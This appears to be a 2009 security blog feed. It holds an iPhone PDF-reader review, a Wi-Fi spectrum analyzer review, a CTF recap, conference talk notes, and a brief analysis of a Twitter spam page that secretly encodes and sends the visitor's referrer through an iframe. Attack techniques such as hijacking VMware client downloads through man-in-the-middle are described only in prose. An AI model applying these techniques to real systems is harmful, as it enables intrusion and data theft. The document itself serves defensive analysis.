What can be better to do on the tube than to kill some time reading manuals or books? Of course in IT quite a lot of that stuff comes as PDFs or other non-paper formats, so good eBook reader or an app for whatever terminal you have is an advantage.

During one of the DC4420 meetings one of the guys gave a very good recommendation for an iPhone app that copes very well with PDFs and some other formats. The app is called Good Reader and I have to say, it's really good (for what I need it to do).

Usually the problem is how to deliver the files of interest to the reder. You want to be able to read when off-line and have flexibility in delivery methods of course. Here is the thing that sold me to the Good Reader - you can upload the files over wifi directly to the iPhone, using nothing more than a web browser. Yes - the app functions as a web server to do it! Just to make sure it doesn't turn your phone into public web server, you have to confirm that you want to allow the given IP to connect and you get that question every time you turn the wifi upload option on.

]]>
This is of course just the local method of doing it and it's not all of what Good Reader can do to get the content for you. Nice feature is that you can save a web page using Download option or connect to another server to get your files and here's another nice thing... you get a selection of popular e-mail providers, general POP/IMAP access, iDisk, Google Docs, Dropbox, WebDav, FTP and others. To be fair - that looks very good!

Last but not least - 'reflow' option (above) is brilliant - it reformats text into your standard font, bigger and easier on the eyes. That messes up some of the documents a bit, but then with one touch you can jump back to normal view and all looks well again. Important note - there is no problem with embedded images, graphs, diagrams, etc. They are all displayed exactly as they should and that's really important for technical stuff. If you use large documents you should like this one - I didn't notice significant delays in viewing huge PDFs (some having 800+ pages and weighting 50+ MB).

I think I've finally found an app for proper RTFM on the move and it came at the very reasonable price of Â£0.59.

AirView2 Spectrum Analyzer

2009-12-15T22:42:13Z

Recently I had some serious problems with wi-fi at home - especially one of the laptops was dropping off and couldn't come back. Quick survey using Kismet and other tools to scan what's flying around has proven that my network is in less populated part of the spectrum (at least here) but still, problems are getting worse and worse.

I was fully aware of Wi-Spy by Metageek, seen it in action previously but never had a chance to buy one. Part of the decision was the price back then, maybe now it would be another game, but anyway - I got myself another device, made by well known wi-fi vendor Ubiquiti and it's called AirView2.

What's so special about this one? Why it's better than Wi-Spy?

First of all I didn't say it's better. It's different, woks with Linux, Mac OS X and Windows, has a nice price tag and does pretty much the same as Wi-Spy. Let's have a closer look then, shall we?
]]> It's different

Well, obviously it is... it comes from different vendor... and this post is not a sales pitch - it's just what I've experienced myself. On a bit more serious note, it's smaller than all the Wi-Spy models I've seen so far. Smaller is good, right? Yes - takes up less space, No - easier to loose (looks almost like USB stick).

Works with Linux, Mac and Windows

Yes, it does... better or worse but it does and it's not a matter of hardware or bundled software, but clearly it depends on the host OS and Java. You got it right - Java!
Software is written in Java to be really cross platform, but those that are not Java developers but use it a bit know quite well what a pain in the rear Java can be. Same is here - Ubiquiti warns about compatibility issues, there are long posts on the forums why this particular version of AirView software doesn't work (mostly on Mac OS X) and how to fix it, etc.

Windows - OK, even inside VM with USB passed through to the guest VM (tested VirtualBox, VMWare Workstation and Fusion - all with Windows 7 and latest Java). It was all very slow, loosing connection with the device and re-initializing it all the time, but worked. In native mode with Windows 7 on bare metal box worked like a charm (tested on a netbook PC).

Linux - didn't try, not enough time - sorry.

Mac OS X - yeah... that sucked! If you have the latest patches installed most likely the software will hang on detecting the device. Of course the reason is Java + OS X (I'm on 10.6.2 as of now with Java 1.6.0_17 in 64-bit mode).

java.lang.UnsatisfiedLinkError: /Library/Java/Extensions/librxtxSerial.jnilib: no suitable image found. Did find: /Library/Java/Extensions/librxtxSerial.jnilib: no matching architecture in universal wrapper thrown while loading gnu.io.RXTXCommDriver

Exception in thread "AirViewer-Initializer" java.lang.UnsatisfiedLinkError: /Library/Java/Extensions/librxtxSerial.jnilib: no suitable image found. Did find: /Library/Java/Extensions/librxtxSerial.jnilib: no matching architecture in universal wrapper

WTF?! File not found... but found? Never mind - luckily the solution is very simple - AirView comes with it's own version of librxtxSerial.jnilib so the one that came with OS X needs to be disabled temporarily and problem will go away. That can be done very easily with one command in the terminal:

mv /Library/Java/Extensions/librxtxSerial.jnilib{,-disabled}

That's it, now it works :-)

Price tag

This argument is obviously quite important. Is it that much cheaper? I'm not so sure... of course you can get the basic Wi-Spy for about Â£65+VAT so even if AirView2 would be equal to it in hardware terms, it would cost a bit more - Â£69+VAT... There is one catch to it though - AirView2 comes in several versions. I bought the AirView2-EXT for Â£64+VAT and this one has MMCX connector for external antenna (because it doesn't have a built-in one) and with clip-on omnidirectional antenna (~3-5dBi I guess) in the package. To buy Wi-Spy with RP-SMA connector you would have to spend at least Â£120+VAT which is almost double the price of AirView2-EXT.

HINT: Wi-Spy with RP-SMA is 2nd generation - faster with better scan resolution than the first generation of the device. So far I didn't have enough time to grab the full spec for AirView2 and compare them side by side - that would be very interesting (it's already on my TODO list).

Does it do the same stuff?

I would say YES based on what I can see, but as most of those devices are SDRs (Software Defined Radio), they can do all the software allows them to do and I didn't have a chance to compare recent version of Wi-Spy software to the AirView one, so please take my words here with a grain of salt and look for other sources to confirm that.

Conclusions

The device worked for me like a charm - it turned out that the signal from my AP was attenuated by temporary objects that came in the way (books - whole piles of them) and as the amount of networks around at least doubled in the last 12 months, somebody put up some very messy device that is transmitting all the time with a very wide signal, exactly in the area of channel I was on - so here come the interference!
Quick look at the graphs and it was clear, that simple channel change should cut down on the interference and moving books a bit will improve signal strength in a place where this unlucky laptop is used most of the time - it worked very well, no more problems!

Looking at the bottom line, for me that's a money very well spent! I was asking myself a question 'how often I will use this thing' and now I really appreciate the power of seeing something that Kismet and similar tools won't see.

Using spectrum analyzer like AirView or Wi-Spy (doesn't really matter which one - pick one that suits your needs) is like reading between the lines - there is a lot of valuable information out there... if only you can see it!

The Hex Factor at SANS London 2009

2009-12-05T09:32:23Z

The competition is now officially over and I have to say it was AWESOME!

Those that made it to BruCON had a chance to play it, those that came to SANS London 2009 also had their fun, all the rest of you - bad luck :-/ maybe next time.

The Hex Factor was run for four evenings/nights at The Fox Bar and Restaurant located literally next to the Excel center where SANS courses were hosted. What can be better than beer, hacking and a spirit of competition?!

Tasks set by the authors were varied in difficulty and topics they covered. One category was about history and culture of hacking with a bit of general teaser tasks and was called Once Upon A Time, like finding a name of candy shop at , so that was a soft introduction.

My favorite category was Out Of The Box category (also known as Pure Leetness), where questions were really 'out of the box' and solving them was the best fun I had for a long time! First 100 points for finding a number 'hidden' in the message was really simple and here's how I did it:

I didn't have time to do the one for 200 points, but finally after some time I managed to solve the 300 points one - finding a secret number hidden in the PDF file - hats off to Didier Stevens for this task - it was amazing! Didier's blog was a great guide and help in the process.
]]> Pwned and consisted of physical box with sensors you had to trigger in the right order to get the code and two systems to be penetrated. As I said, the difficulty was varied and so were the nominal point values for each task, from 100 to 300, but you could also get the partial points if you did only part of the task properly. Of course during competition like this one you are never alone... Hello brotha!

Anyway, it was all very very friendly competition - beer infused with brains hurting after the classes (typical for 'SANS Fire Hose Syndrome').

Third category of tasks was Binary fu where you had to work your way through programs delivered as .exe files and get the secret codes out of them. First one was easy, but again I had no time to go through the remaining two. That is the reason why our team (I was working with Chris Riley, better known as @ChrisJohnRiley) was called Drunk and going home.

At the end we were #4 at the leader board but as it turned out, two teams of the first three were the same people, so kind of we are #3, so here we are - two of three winning teams, already in The Hex Factor t-shirts!

I'd like to say THANK YOU to all the people behind The Hex Factor - it was really awesome experience and great fun, so I hope it's not the last time we see The Hex Factor. See you next time!

CONFidence09.02 - post mortem

2009-11-28T09:45:34Z

Well... my plan to blog live from the CONFidence was good but still remained to be more of a plan than a reality. Twitting went much better (possibly because you can twitt between chats with people, drinks, etc) so I'll wrap up what happened and how it went.

The conference was great - I really liked the lectures (those I actually made to), loved the chat with speakers and it was awesome to meet some old friends and make some new contacts. Overall, if you didn't come to Warsaw for CONFidence09.02 you missed quite a lot.

Day 1 summary
There was very nice presentation by Felix "FX" Lindner on how 'awesome' Cisco IOS is, Claudio Criscone (@paradoxengine) talked about security in virtualization environments, Frank Breedijk renamed hist AutoNessus to Seccubus (new twitter feed at @seccubus), Leonardo NVE Egea showed us how you can use the satellites to work as your downlink (and it seemed much easier than actually you would think), Pavol Luptak pretty much owned the RFID there (yes, the basic cloning kit is just â‚¬30), Elisa dropped the pressure a bit with Power Point Karaoke where Felix "FX" Lindner was presenting about detecting unknown alcohols, Raoul Chiesa gave great presentation about knitting (yes, knitting) and I was rolled into a presentation about IT slang/acronyms and there was something about insulting someone :-) and that was just the first day.

Day 2 summary
For those that survived the 'afterparty' on the evening/night/morning you had a chance to see nice explanation of the cold boot attack given by Nadia Heninger, Nick DePetrillo discussed 'what could go wrong' with intelligent power grids and believe me... there's a lot! Jacob Applebaum (@ioerror) gave us some TOR love and a lot of TOR laptop stickers. Alessio "mayhem" Penasilico (@mayhemspp) and Raoul Chiesa gave nice presentation on history of hacking telcos - there was some good info there... just before Raoul killed it all with final presentation dissecting the underground economy (with some slides show just after the cameras and other recording equipment was turned off). That was a really good one...

Finishing off, Frank has posted a bunch of posts about presentations we saw in Warsaw. They are:

Fusing 3rd party threat feeds to obtain better threat intelligence - Eddie Schwartz
Router Exploitation - Felix "FX" Lindner
My Seccubus slide deck (slides from Frank's presentation)
My TLS renegotiation vulnerability slides (Frank's lightning talk during one of the breaks)
Mifare Classic anaysis - Pavol Luptak
Power Hungy People - Nick DePetrillo
The Tor Project - Jacob Appelbaum
Underground economy - Raoul Chiesa

That's it for now - just make sure you get there next time :P

Claudio Criscione - Virtualization security

2009-11-19T16:11:17Z

Claudio gave today brilliant presentation about virtualization security... Just a few bullet points from the presentation.

It turned out that VMWare hypervisor is running Tomcat to give you the admin interface - oldie (shall I read it 'unpatched') but goldie, right?
You can do MiTM against VMWare VI Client... and as presented at the demo, that works like a charm, plus...
... if you can MiTM you can pwn the box - clients.xml that is served by the server contains a URL of the client .exe to be executed - boom, you can change that!

Just to give you the idea - during live demo Claudio forced the admin PC (the one running VI Client) to format drive C: and there was no option to stop it, it pretty much kicked off right away.

There was much more than that - also Xen and Ubuntu got their share here but the practical demo was based on VMWare.

Lessons learned?
Treat VM hosts and their apps just as another computer, another system and make sure you secure them the same way as any other system. Think of patch management and what happens when you revert to a snapshot (it may be old and unpatched so you bring back unpatched or already compromised system), think of separation of duties and access (physical and logical).

CONFidence09.02 - day 1 kicked off

2009-11-19T13:41:43Z

Almost half of the day at CONFidence09.02 has already passed. Some interesting stuff of course...

Starting with Dragorn's and RenderMan's "Wireless threats; They're not dead yet!" we've heard once again how bad and how dead WEP really is. Good refresher for some people I guess. Best part was discussing client side attacks via wifi - airpwn style but without goats this time, using malicious JS with such a nice feature like browser side caching, defeating SSL, hiding all of that in plain sight with call-home feature that will be very hard to notice in most of environments.

Then I skipped several presentations - I really needed a reboot :-)

Next one I made to was Felix "FX"Lindner talking about how sweet hacking Cisco IOS can be. Frank (@autonessus) has already blogged about this one so I'll just put a few notes here.

Cisco's HTTP admin interface runs off their understanding of HTTP and not Apache.
IOS doesn't have recovery procedure for software crashes due to it's monolithic structure - the only remedy is to reboot the whole box (quite easy to spot even by untrained admin - the networkz are down!) which takes time (even several minutes).
Cisco has added TCL scripting in some versions of IOS :-)

More to follow... and yes, we use #confidence0902 as hashtag.

Twitter, SPAM and zombie hookers

2009-10-27T12:46:20Z

Came out of a blue - no context, nothing... BTW - we've got new URL shortening service.
All would be almost 'fine' but WTF is that? Not that I wouldn't guess but I'm just curious how owned you can get :-)

As a matter of fact, you can get owned pretty bad and what I've seen I would expect to be just a starter... the main course is coming soon!

WARNING: All the information provided in this post is available on the Internet. Links presented on screen shots should be considered malicious - do not visit them unless you really know what you are doing. You have been warned.

]]> Just as your mother told you...

The best way IMHO to check stuff like that is the old school way...

Looks broken, right... redirect ok - that's what I've expected, but then... hold on - Client-Peer IP is not mine in any way... so who owns this one?

Isn't that just sweet? You go to a website and the traffic goes via proxy somewhere in China. Well - that's not all in fact. Let's grab a clean VM, make snapshot just in case, connect - let's see what a sexy girl has to offer, right?

NSFW

Don't to that at work or you may get strange looks from people around (at best) ;-)

The Bait

Page loads and looks like a blog - that's what the URL would suggest, but if you look in the source... I said THE SOURCE, not the boobs on the page!

Right... in the source you find the gems. First of all the page is using GeoIP JavaScript include from Maxmind - we all know it works well - to give the reader more personalized experience when you read the story (don't even tell me you are still looking at the photos - lol). As an effect the page resolves that I connect from IP address in London and that the poor girl comes from 'a small town near London , H9' and has to work as a stripper to pay her college fees...

London, H9... hold on - London doesn't have H9 post code (although on the page it looks like it was a part of address). GeoIP information is used in several places and looks quite... convincing... as long as you focus on the boobies... oh and forget about the fact that the bottom of the page says 'She is single boys!!!! She lives in my hometown of London' - right, somebody doesn't even have a spell check :-]

The Shot

Let's look at the gems on the top shelf... I don't have a lot of time to look at it properly, so just quick bullet points:

We have a JavaScript that contains two functions 'encoding' their input. Well kind of encoding because it uses ord() to do it and it seems the author is not very skilled, but anyway - he/she managed to produce working code
Call to encode function with referrer URL given as parameter - why someone is trying to steal my referrer info?
JavaScript print out an IFRAME linking to HTML file and passes encoded string as a parameter. The file came back empty, but GET string is left in their logs :-)

Getting the referrer string doesn't look that bad... right? Anyway, why do they want to know where am I coming from? Is that like SEO and affiliate tracking for malware? Interesting!

Post Mortem

Not much of it... As I said I don't have time to play with it properly and see if for example I actually get something from this 'empty' html file. It would be trivial to provide further payload if the victim provides properly encoded referrer string that is of attacker's interest.
How effective it would be if the bad guys used this just to check via which channel the victim came to them (they can also find out which channels are the most successful - it's just like marketing campaigns)? The next logical step would be to provide customized exploit - if victim came from Twitter do bad stuff to a Twitter user, Facebook - get them owned on Facebook, etc.

Surely the guys are learning and their intentions are not good. Keep an eye out and don't get yourself fooled!